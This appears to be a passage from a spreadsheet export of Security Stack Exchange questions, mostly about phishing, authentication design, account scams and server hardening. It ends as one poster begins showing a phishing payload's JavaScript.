  &lt;p&gt;If you have any other questions, please visit our Help Center.
  Thanks,
  The Facebook Team&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;The link was&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;&amp;lt;a href="https://www.facebook.com/recover.php?n=[redacted] "color:#3b5998;text-decoration:none;"&amp;gt;this link&amp;lt;/a&amp;gt;&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Is this a genuine email from Facebook that is ridiculously prone to abuse ("Can't remember what I did a few days ago - I'd better click that link!"), or a phishing email that's managed to guess my first name?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Conducting Ethical Phishing Attack</t>
  </si>
  <si>
    <t>&lt;p&gt;For research purposes, I'm conducting an ethical phishing attack in my institution. I have permission from the institution for the same. I've created the phishing site and the email content, and I'll be recording who and how many users visited the phishing site. I intend to send links to a phishing website in the email like &lt;a href="http://somesite.com" rel="nofollow noreferrer"&gt;this&lt;/a&gt;.&lt;/p&gt;
 &lt;p&gt;Where do I host this site and how do I send this email?&lt;/p&gt;
 &lt;p&gt;I've seen some free hosting sites. Do email providers give low reputation to such free hosting sites?&lt;/p&gt;
 &lt;p&gt;Also, for sending the email, should I choose popular email service providers like gmail, hotmail or should I use disposable email? What will increase the chances of the email reaching the users?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;social-engineering&gt;&lt;websites&gt;</t>
  </si>
  <si>
    <t>What is this authentication method/approach called?</t>
  </si>
  <si>
    <t>&lt;p&gt;Background: I want to implement something like this in our websites, and I'm looking for advice and possibly APIs that allow this out of the box rather than re-inventing the wheel, but I can't even figure out the right search terms. &lt;/p&gt;
 &lt;p&gt;As seen on my bank account:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;When I registered, I was asked to pick a phrase that I would remember&lt;/li&gt;
 &lt;li&gt;Now, when I log onto my website, the process is as follows:
 &lt;ul&gt;
 &lt;li&gt;I enter my Username and click "next". &lt;/li&gt;
 &lt;li&gt;The bank site shows me this phrase. &lt;strong&gt;This helps me to be assured that I am actually on my bank's site, and not some fake site set up to steal my login credentials.&lt;/strong&gt;&lt;/li&gt;
 &lt;li&gt;If the pass-phrase matches, I enter my password to complete the authentication process.&lt;/li&gt;
 &lt;li&gt;If the pass-phrase doesn't match, I know that either I entered my username wrong or I'm on a phishing site, and I go back to my bank's home page and start over.&lt;/li&gt;
 &lt;/ul&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;In my mind, this sounds like "multi-step authentication". However, when I search for that, I keep getting results for multi-factor authentication - authentication using a token, or two-step authentication &lt;a href="http://support.google.com/accounts/bin/answer.py?hl=en&amp;amp;answer=180744"&gt;as implemented by Google&lt;/a&gt; and other sites. While I'm a HUGE proponent of multi-factor authentication using tokens or codes sent to your mobile device, I also want to figure out how to do what my bank is doing.&lt;/p&gt;
 &lt;p&gt;Is there a name or term for this authentication pattern?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Paypal payments redirecting to fraudulent URL</t>
  </si>
  <si>
    <t>&lt;p&gt;At my place of work, our paypal appeared to have been compromised so that a clone of paypal would appear and ask for customer credentials. The url it directed to was &lt;code&gt;https://checkoutnow.mdigo.com/store/login.php&lt;/code&gt;, and searching this on google yields no real results, so I don't really know what to search for.&lt;/p&gt;
 &lt;p&gt;The slightly alarming thing is that none of this triggered any of our security systems and it was only when a customer notified us that we were able to disable paypal payments temporarily.&lt;/p&gt;
 &lt;p&gt;We are using Prestashop as the ecommerce platform. This is hosted on a server on which we own. There is a whitelist of IP addresses that may access our server and change site details. &lt;/p&gt;
 &lt;p&gt;I need help in researching this type of security breach so we can avoid it in the future. So, I ask:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;p&gt;What is this type of URL obfuscation called?&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;How could they have got past when only whitelisted IP's can access
 the server and change this information?&lt;/p&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;hr&gt;
 &lt;p&gt;We have changed the passwords for the website and upon doing a test there, the actual paypal site is redirected to when making a payment with paypal.&lt;/p&gt;
 &lt;p&gt;If you can help me improve the question, or need any more information, please leave a comment below.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;paypal&gt;</t>
  </si>
  <si>
    <t>An authentication protocol to prevent phishing &amp; solve the problem of password reuse?</t>
  </si>
  <si>
    <t>&lt;p&gt;When writing about best practices for authentication, I find that today's best practices still leave gaping holes in security, specifically not solving the problem of password reuse by users - websites are currently sent the user's input which means they could be storing it without them knowing. It also means that a user that is tricked into visiting a malicious site instantly gives away their credentials.&lt;/p&gt;
 &lt;p&gt;When I talk of passwords, I believe that any authentication key, whether it be generated via biometrics, a physical key or a password should be forced to use this protocol.&lt;/p&gt;
 &lt;p&gt;I have been unable to find any such protocols online for this purpose, the current idea would be something of the sort (I'm not a crypto expert, this is merely an example).&lt;/p&gt;
 &lt;p&gt;1) The LoginID is passed to the server, the server responds with a user-set reply to validate they are logging in at the genuine site.
 2) The user's browser is sent a cryptographic key linked to their account, when the user inputs their password, the browser first encrypts this key with the users password &amp;amp; then hashes it, before sending it to the server. The server should then follow best practices for password storage as currently advised.&lt;/p&gt;
 &lt;p&gt;In sumarry, what is needed:
 1) A mechanism when authenticating that is clear to users that they are logging in at the correct location that they believe they are.
 2) The website must never receive the user's actual authentication key (i.e. their plaintext fingerprint).&lt;/p&gt;
 &lt;p&gt;Why?
 I first thought of this when thinking about multifactor authentication and thinking it is rather a bad idea to transmit biometrics to anybody for any reason in plaintext, (over encrypted channels, it doesn't matter), as we have seen all too many times websites not taking adequate security measures, it is not so easy to change ones fingerprint. Included must be some form of mechanism to ensure the user does not transmit credentials to the wrong site. Hence I reccomend the two-stage login, the user login ID (which should not be a username or an email, it should be private), is entered, upon entry the user is sent the prompt they set, this could be an image or text or both, this acts as a way of preventing simple phishing attacks which aim to clone sites. THis is necessary to prevent phishing attacks else malicious sites will still mimick genuine ones, or unattentive users will fall victim. (I reccomend that the browsers flag login inputs as 'insecure', informing the user will be sent in plaintext, if websites choose not to adhere to this standard).&lt;/p&gt;
 &lt;p&gt;Again this is just an example. It just seems that it is not all too complex or costly to implement what would be a real advantage to user security. It would eliminate the need for a password manager &amp;amp; make password breaches a minor inconvenience. And as said earlier, it adresses the pressing issue of biometrics.&lt;/p&gt;
 &lt;p&gt;Again I'm no crypto expert, this is just a simple example protocol.&lt;/p&gt;
 &lt;p&gt;I have attempted to find information on protocols for this purpose but have failed. I have seen some answers on stackexchange reccomending such a thing, but not a dedicated post. I apoligise if this is a duplicate, the search terms on this matter predictably throw up irrelevant posts.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;passwords&gt;&lt;cryptography&gt;&lt;password-policy&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Honeypot URL and reporting site</t>
  </si>
  <si>
    <t>&lt;p&gt;Is there some sort of tool list that can work with Apache/NGinx/etc that has a list of "honeypot" URLs such as &lt;code&gt;/HNAP1/&lt;/code&gt; that when it gets detected in the logs of the web server then it will automatically report to some other site like those in &lt;a href="https://security.stackexchange.com/questions/1728/where-to-report-malicious-urls-phishing-and-malicious-web-sites"&gt;Where to report malicious URLs, phishing, and malicious web sites?&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;It does not have to be part of the web server itself ie a module, it could also be a log analysis tool. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;exploit&gt;&lt;webserver&gt;</t>
  </si>
  <si>
    <t>Are address bars unphishable?</t>
  </si>
  <si>
    <t>&lt;p&gt;I've taken, out of curiosity, the &lt;a href="http://www.opendns.com/phishing-quiz/"&gt;Phishing Quiz by OpenDNS&lt;/a&gt; that tries to teach the general public about detecting phishing:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Ever wonder how good you are at telling the difference between a legitimate website and one that's a phishing attempt? Take this quiz to find out.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;I did it mostly because my phishing detection process basically looks like this:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Does the address bar look legit?&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;...and if it does I'll think the site is legit. That is most likely simplistic, but (spoiler alert!) &lt;strong&gt;you can get all 14 questions right just by looking at the address bar.&lt;/strong&gt; "Yahoo!! is upgrading!!!" from "docs.google.com/spreadsheets"? Yeeeeah, that kind of &lt;em&gt;barely&lt;/em&gt; smells like phishing.&lt;/p&gt;
 &lt;p&gt;Assuming the DNS server is not compromised, is the address bar really &lt;em&gt;that&lt;/em&gt; bulletproof, though? If it isn't, how can I detect whether it's been tampered with or not?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Host header injection attack with Spring boot embedded tomcat</t>
  </si>
  <si>
    <t>&lt;p&gt;Our application has been checked by PEN Test tool, and there are description of issue:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;An attacker can redirect the application using the host header on the
  below mentioned URL to redirect them to phishing websites.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;&lt;em&gt;Reproducing steps:&lt;/em&gt;&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Make request into application&lt;/li&gt;
 &lt;li&gt;Intercept the request using proxy tool &lt;/li&gt;
 &lt;li&gt;Apply attack value into "Host" header &lt;/li&gt;
 &lt;li&gt;Forward the request &lt;/li&gt;
 &lt;li&gt;Observe the 302 response with the injected attack value&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;&lt;em&gt;Expected behaviour:&lt;/em&gt;
 &lt;strong&gt;White-list all the redirect URLs. Make sure users are reminded that they are going out of domain before the redirect occurs.&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;So, as we use spring boot with embeded tomcat, I guess it should be some server settings.&lt;/p&gt;
 &lt;p&gt;May be someone can help with required steps for this attack preventing? &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;attacks&gt;&lt;tomcat&gt;&lt;host-header-injection&gt;</t>
  </si>
  <si>
    <t>How secure is CertiVox M-PIN?</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;a href="https://www.certivox.com/" rel="nofollow noreferrer"&gt;CertiVox&lt;/a&gt; have designed a system with the aim of "getting rid of passwords".&lt;/p&gt;
 &lt;p&gt;Essentially the system authenticates users with two factors of authentication: A 4 digit PIN and a token stored within the browser's HTML5 storage. There is also the option of authenticating with a mobile phone by entering a one time passcode which is displayed on your computer's screen on the website you are trying to authenticate with. I believe this also requires the HTML5 storage token to be present. I'm assuming some sort of cross-domain call will enable the JavaScript to get what it needs to validate the token stored in the origin of the authentication server in both cases.&lt;/p&gt;
 &lt;p&gt;There is no password database as the system uses cryptography and zero knowledge proof in order to authenticate you with the service you are logging into. The keys are split between their master server and your own hosted server (in the case of M-PIN SSO).&lt;/p&gt;
 &lt;p&gt;CertiVox are the same company that ran PrivateSky, which &lt;a href="https://www.certivox.com/blog/bid/359788/The-real-story-on-the-PrivateSky-takedown" rel="nofollow noreferrer"&gt;was taken down at the end of 2013&lt;/a&gt;. There is a question relating to PrivateSky on here (&lt;a href="https://security.stackexchange.com/questions/13226/how-can-privatesky-not-see-your-data"&gt;How can PrivateSky not see your data?&lt;/a&gt;) and it seems to have similarities in the way it works to M-PIN. See &lt;a href="https://security.stackexchange.com/a/13289/8340"&gt;Brian from CertiVox's answer here&lt;/a&gt;.&lt;/p&gt;
 &lt;p&gt;On first impression it reminds me of what SQRL tries to achieve. Related posts to SQRL are here:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;a href="https://security.stackexchange.com/questions/43374/could-sqrl-really-be-as-secure-as-they-say"&gt;Could SQRL really be as secure as they say?&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a href="https://security.stackexchange.com/questions/46192/how-does-the-mitm-man-in-the-middle-attack-happen-with-respect-to-sqrl"&gt;How does the MITM (Man in the middle) attack happen with respect to SQRL&lt;/a&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;A page covering &lt;a href="https://www.certivox.com/m-pin-in-depth" rel="nofollow noreferrer"&gt;M-PIN in depth is here&lt;/a&gt;.&lt;/p&gt;
 &lt;p&gt;My thoughts are:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;The MITM scenario is not possible like it is with SQRL because the MITM will not have the token in their browser.&lt;/li&gt;
 &lt;li&gt;As the token is stored in the browser, this becomes the prime target for any attacker.&lt;/li&gt;
 &lt;li&gt;The PIN entry in the browser is susceptible to shoulder surfing, although useless without the browser token.&lt;/li&gt;
 &lt;li&gt;A phishing attack could retrieve the PIN, again useless without the browser token.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Are my above assumptions correct? Are there any other weaknesses or advantages over using something like LastPass Enterprise (say using 100% generated passwords with 128 bit entropy and Yubikey 2FA for LastPass login)?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;passwords&gt;&lt;cryptography&gt;&lt;multi-factor&gt;</t>
  </si>
  <si>
    <t>Tightly locking down a FreeBSD jail</t>
  </si>
  <si>
    <t>&lt;p&gt;Suppose one is running a single internet-facing daemon, as a service in a FreeBSD jail, and expects targeted hostile attacks targeting open WAN ports and services.&lt;/p&gt;
 &lt;p&gt;Like many services, the service and indeed its jail don't need interactive user login or ssh, as it can be completely configured and managed by editing its boot/rc files from the host login, and its logs can be monitored the same way.&lt;/p&gt;
 &lt;p&gt;So it's very tempting to look at attack surface, and remove/deny/disable &lt;em&gt;everything&lt;/em&gt; that an attacker could use to escape the jail or pivot to other networked devices. &lt;/p&gt;
 &lt;p&gt;As a first step, trivial package dependencies for the desired service are easy to identify, allowing many files and packages to be removed, and also root and other builtin accounts can be set to shell=nologin (or at least no interactive login), standard jail sysctls can be used, packages kept updated, and other services potentially used to gain access can be avoided (no sshd/ftp/email). &lt;/p&gt;
 &lt;p&gt;But assuming an attacker can find an exploitable vulnerability in the daemon, what &lt;em&gt;other&lt;/em&gt; configuration might be worth removing from the jail or restricting (capabilities, access rights, or essential system utilities), in order to harden the jail and hamstring an attacker who managed to exploit a vulnerability within the jailed service, or even one who discovered a way to gain root within the jail.&lt;/p&gt;
 &lt;p&gt;&lt;em&gt;(Threat model note: Physical access, social engineering/phishing, and high speed brute credential forcing, aren't relevant to the question. I'm taking as a starting point, a remote determined attacker who can access a port or running service in the jail, and hopes to exploit a discovered vulnerability to escape the jail and attack its host)&lt;/em&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;hardening&gt;&lt;freebsd&gt;</t>
  </si>
  <si>
    <t>Is it a bad idea to replace passwords with OTP?</t>
  </si>
  <si>
    <t>&lt;p&gt;As I understand things, given a user with proper password management (e.g. with a libre password manager like &lt;a href="https://keepassxc.org/" rel="noreferrer"&gt;KeePassXC&lt;/a&gt;) the only realistic threat is having passwords leaked the following ways:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;p&gt;&lt;strong&gt;A:&lt;/strong&gt; password keylogged (e.g. logging in to your account on any compromised device) or phished&lt;/p&gt;
 &lt;/li&gt;
 &lt;li&gt;&lt;p&gt;&lt;strong&gt;B:&lt;/strong&gt; manager database leaked (e.g. unlocked on your compromised device)&lt;/p&gt;
 &lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;OTP as single-factor authentication is enough to protect against &lt;strong&gt;A&lt;/strong&gt; if not attacked before token expiry (but perhaps that is not a realistic assumption after reading the answer of @CBHacking). In this regard, OTP is superior to passwords (even if not as much as I previously thought), and I cannot think of any way they would be inferior. Thus, OTP seems strictly superior to passwords.&lt;/p&gt;
 &lt;p&gt;2FA mitigates the risk of &lt;strong&gt;B&lt;/strong&gt;, but it seems excessive for marginal benefit: it is relevant if and only if the first factor is compromised while the second one is not. While this might not be an uncommon situation today, I think it would be uncommon in the case where OTP replaces passwords and even more uncommon with the premise of a user with proper password management for the following two reasons:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;OTP is less likely than passwords to be stored on a compromised device (PC).&lt;/li&gt;
 &lt;li&gt;A user who uses a password manager is more likely to store both factors on the same device (I myself have my TOTP and passwords in the same KeePassXC database).&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Even if I am wrong about 2FA being excessive, and especially if the user is &lt;em&gt;not&lt;/em&gt; good at password management, it seems superior to have [OTP + OTP] rather than [password + OTP] as 2FA.&lt;/p&gt;
 &lt;hr /&gt;
 &lt;p&gt;Is it a bad idea to offer users to replace passwords with OTP?&lt;/p&gt;
 &lt;p&gt;Is it a bad idea to force users to replace passwords with OTP?&lt;/p&gt;
 &lt;p&gt;If passwords are not used, does 2FA (double-OTP instead of single-OTP) offer substantial benefit?&lt;/p&gt;
 &lt;hr /&gt;
 &lt;p&gt;P.S. While writing this I came up with one reason [password + OTP] might be superior to [OTP + OTP]. In the former case it is less likely that both factors are stored on the same device.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;password-management&gt;&lt;multi-factor&gt;&lt;one-time-password&gt;</t>
  </si>
  <si>
    <t>Is it possible to set up a webpage to force a mobile browser to click on two off-site locations in order to fake a sign-up?</t>
  </si>
  <si>
    <t>&lt;p&gt;I've recently been victim to a scam. I was signed up to an internet gaming 'club' despite never knowingly having visited their site, read their T&amp;amp;C's nor clicked an agreement.&lt;/p&gt;
 &lt;p&gt;Under UK regulation such services are required to send you a text message to tell you about your membership. I ignored this as was not aware of my 'sign-up', believing it to be phishing/spam. This natural psychological reaction helps aid the scammer. I ignored it to my cost as several months later I noticed the additional anonymous charges on my mobile account. &lt;/p&gt;
 &lt;p&gt;To my amazement I looked back at my browsing history months later and discovered that I had in fact accessed their website, twice, in quick succession, but without my knowledge and without seeing any content. The first click had the description of the site I had knowingly visited (some blog page), but the address of somewhere completely different.&lt;/p&gt;
 &lt;p&gt;Even more incredibly, about 2 weeks later, my browsing history on iCloud showed an access to one of their online javascript game pages that again I NEVER KNOWINGLY VISITED!&lt;/p&gt;
 &lt;p&gt;Now I can imagine how I might have clicked on a banner or pop-up who's true purpose was disguised, but how have I unknowingly accessed their web pages THREE times with such a large space of time between the last two visits?&lt;/p&gt;
 &lt;p&gt;Clearly these guys also had access to my mobile phone number, presumably 'kindly' exposed by my mobile ISP (thanks guys!), along with who my ISP was. This gave them UNFETTERED ACCESS TO CHARGE ME VIA PREMIUM SERVICES! (and thus exposing the carrier to accusations of money laundering ...)&lt;/p&gt;
 &lt;p&gt;Any idea how they might have pulled this off?&lt;/p&gt;
 &lt;p&gt;How did the attacker piggyback on the 3rd party blog site? How might they be distributing their attack?&lt;/p&gt;
 &lt;p&gt;What can the 3rd party site do to protect themselves and how can the browser be improved to block such an attack?&lt;/p&gt;
 &lt;p&gt;(PS phone is an iPhone, as you might imagine, and browser is Safari)
 (PPS judging by the mobile ISP's user forums, this technique has netted victims over at least 3 years, costing the ISP goodness knows how much in customer service complaints etc., there's a real economic impact to this one!)&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;fraud&gt;&lt;scam&gt;</t>
  </si>
  <si>
    <t>If someone bought the .local TLD could that be a security risk?</t>
  </si>
  <si>
    <t>&lt;p&gt;Now that the ICANN is allowing custom Top Level Domain names and &lt;a href="https://serverfault.com/questions/47087/using-local-for-internal-websites"&gt;often corporate IT workers like to use &lt;code&gt;.local&lt;/code&gt; as the TLD for internal networks&lt;/a&gt;, if someone does buy the .local TLD what are some possible dangers a user could encounter?&lt;/p&gt;
 &lt;p&gt;The main example I can think of is spear-phishing attacks. If a company has computers like &lt;code&gt;SuperSecureServer.local&lt;/code&gt; on their LAN and a malicious attacker makes &lt;code&gt;TotallyARealCorporateServer.local&lt;/code&gt; would &lt;code&gt;TotallyARealCorporateServer.local&lt;/code&gt; resolve to the attackers IP? If it did, the attacker could send a bad link then could impersonate a real server and get domain login credentials.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;dns-domain&gt;</t>
  </si>
  <si>
    <t>Bogus Instagram account using my email, never been verified, has over 1000 followers</t>
  </si>
  <si>
    <t>&lt;p&gt;This appears to be a phishing scam like I've never encountered before.&lt;/p&gt;
 &lt;p&gt;I received an email from &lt;code&gt;security@mail.instagram.com&lt;/code&gt; to an email address I rarely use, but I noticed it because messages get forwarded to my main email address. The subject is: &lt;strong&gt;New login to Instagram from Instagram app on Apple iPhone&lt;/strong&gt;.&lt;/p&gt;
 &lt;p&gt;Well, that wasn't me. I haven't used Instagram in ages, and never did I use it with the email address in question. I take a closer look. It's not my Instagram account, but the email shows a username that is my real name with extra characters. I don't live in San Francisco where the login supposedly occurred, and I definitely didn't set up this account. Someone got my real name from that email address I seldom use and has set up an imposter account.&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/aO7M1.jpg" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/aO7M1.jpg" alt="Instagram email - &amp;quot;We Noticed a New Login&amp;quot;"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;There are several other messages from &lt;code&gt;security@mail.instagram.com&lt;/code&gt; in the inbox of this rarely used email address with the subject &lt;strong&gt;Verify Your Account&lt;/strong&gt; and those too seem authentic, although I suppose the domain could be spoofed (not a subject I know much about). If these are phony email messages, they're unusual phonies, because all the links (for password reset, etc) point to &lt;code&gt;https://instagram.com&lt;/code&gt; URLs. I found it alarming that the one email appears to confirm a successful login to this imposter account that &lt;em&gt;I never verified&lt;/em&gt;.&lt;/p&gt;
 &lt;p&gt;It gets stranger. I decide to take a look at this user, this imposter me's Instagram profile page (&lt;code&gt;https://www.instagram.com/username&lt;/code&gt;). They have:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;0 posts&lt;/li&gt;
 &lt;li&gt;over 1000 followers&lt;/li&gt;
 &lt;li&gt;several hundred 'followed'&lt;/li&gt;
 &lt;li&gt;profile picture blacked out&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;This is an actual live Instagram account, no doubt about it. &lt;/p&gt;
 &lt;p&gt;One link in the email is: &lt;strong&gt;Not your account? &lt;a href="https://instagram.com/accounts/remove/report_wrong_email/" rel="nofollow noreferrer"&gt;Remove your email&lt;/a&gt; from this account.&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;Actually the full URL is longer, followed by a string of about 80 more characters after &lt;code&gt;report_wrong_email/&lt;/code&gt;. I will not post that part because I don't know whether or not it could help a scammer uniquely identify me.&lt;/p&gt;
 &lt;p&gt;After checking that the domain was &lt;code&gt;https://instagram.com/&lt;/code&gt; I followed that one link in an attempt to remove my email from the imposter account. It led to Instagram's site, just not a valid page. &lt;/p&gt;
 &lt;p&gt;The shortened URL from the link above (&lt;code&gt;https://instagram.com/accounts/remove/report_wrong_email/&lt;/code&gt;) led me to a page looking like this:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/iStmW.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/iStmW.png" alt="Instagram &amp;quot;report wrong email&amp;quot; broken link"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;The &lt;em&gt;full&lt;/em&gt; URL led me to a page looking like this:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/j8ZwX.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/j8ZwX.png" alt="Instagram &amp;quot;report wrong email&amp;quot; broken link"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;This page just by itself is weird, having both a Log Out link &lt;em&gt;and&lt;/em&gt; a Log In link shown simultaneously on different parts of the page. It's part of Instagram's official site though. Highly suspicious for such an important link to be broken, pointing to the email being a fake.&lt;/p&gt;
 &lt;p&gt;This definitely smells of a scam, but I can't figure out how the scam is supposed to work or how worried I should be. I have already reset the password on the email address the messages were sent to. &lt;strong&gt;What's the best way to handle this?&lt;/strong&gt; I could try to reset the fraudulent Instagram account password, reclaim the account, and shut it down, but maybe that's exactly what the scammer wants me to try if it's a phishing thing. And what's with all the followers? &lt;a href="https://help.instagram.com/" rel="nofollow noreferrer"&gt;Instagram's Help Center&lt;/a&gt; is pretty useless, with apparently no way to report account fraud to a human being.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;email-spoofing&gt;&lt;identity-theft&gt;&lt;scam&gt;</t>
  </si>
  <si>
    <t>Is it inconsistent to tell users to "not click on password links in email", and requiring clicks on "forgot password" links?</t>
  </si>
  <si>
    <t>&lt;p&gt;On one hand, IT Security shops have been telling users to not click on links in email because they can do damage to your computer, or phish your personal information. Many of those issues are outlined in the link below:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;a href="https://security.stackexchange.com/q/3674/396"&gt;What malicious things can happen when clicking on links in email?&lt;/a&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Then again most of those same shops conflict with their own advice and require their use for certain situations such as:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;p&gt;&lt;a href="https://security.stackexchange.com/questions/29225/should-email-verification-links-be-time-limited-after-user-registration"&gt;email-based verification &amp;amp; registration&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;&lt;a href="https://security.stackexchange.com/q/31361/396"&gt;email-based password reset link&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Since inconsistent guidance never bodes well for security, I think that there should be a pattern, practice, or &lt;a href="https://security.stackexchange.com/search?tab=votes&amp;amp;q=sso"&gt;technology&lt;/a&gt; that will allow for better security and a &lt;a href="http://nakedsecurity.sophos.com/2013/03/03/evernote-reset-password/" rel="nofollow noreferrer"&gt;consistent message.&lt;/a&gt; &lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Question:&lt;/strong&gt;&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;p&gt;What are our options in getting rid of this conflicting advice regarding links in email?&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;What patterns, &lt;a href="https://security.stackexchange.com/q/30083/396"&gt;practices&lt;/a&gt; or &lt;a href="http://www.windowsazure.com/en-us/home/features/identity/" rel="nofollow noreferrer"&gt;technologies&lt;/a&gt; should be adopted?&lt;/p&gt;&lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;&lt;authentication&gt;&lt;web-browser&gt;&lt;email&gt;&lt;password-policy&gt;</t>
  </si>
  <si>
    <t>Is there any smarter way to crack wpa-2 handshake?</t>
  </si>
  <si>
    <t>&lt;p&gt;I was testing on my own router that how secure is my password. First I set a random 9 digit number as a password but the aircrack-ng was unable to crack it even in 45 minutes and tried other tools like pyrit, crunch but they also didn't work very well. So, what I was wondering is that the password cracking tools are unable to crack a mere 9 digit no. then how can they crack a strong password (combination of upper, lowercase, numbers, special characters) however it may crack the password but it can take days or even years. And the other way is phishing which doesn't work always. &lt;/p&gt;
 &lt;p&gt;How does password cracking work in the real world?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;password-cracking&gt;</t>
  </si>
  <si>
    <t>Revising Phising Email &amp; it's payload... did I do this right?</t>
  </si>
  <si>
    <t>&lt;p&gt;Recently my company got a widespread phishing email sent to them, thankfully no one clicked the link (which is great!)&lt;/p&gt;
 &lt;p&gt;Since I'm a student and a current intern working in IT Security I wanted to see what this phishing email contained.&lt;/p&gt;
 &lt;p&gt;I started with running a cURL command on the link and got another link inside of it. Basically the link referenced the second url and refreshed every 2 seconds. &lt;/p&gt;
 &lt;p&gt;I used a cURL command on that link and got this following in the header response&lt;/p&gt;
 &lt;p&gt;(Removed link and domains to prevent infection!)&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;HTTP/1.1 200 OK
 Server: nginx/1.8.1
 Date: Sat, 21 May 2016 22:07:32 GMT
 Content-Type: text/html
 Content-Length: 4713
 Connection: keep-alive
 X-Powered-By: ARR/2.5(bb4753d98)
 Set-Cookie: AFFID=370951; expires=Mon, 20-Jun-2016 22:07:26 GMT; Max-Age=2592000; path=/; domain=.XXXXX.(com)
 Set-Cookie: SID=20AAA; expires=Mon, 20-Jun-2016 22:07:26 GMT; Max-Age=2592000; path=/; domain=.xxxxx.(com)
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Inside that body, was a javascript containing this code.&lt;/p&gt;
 &lt;pre&gt;
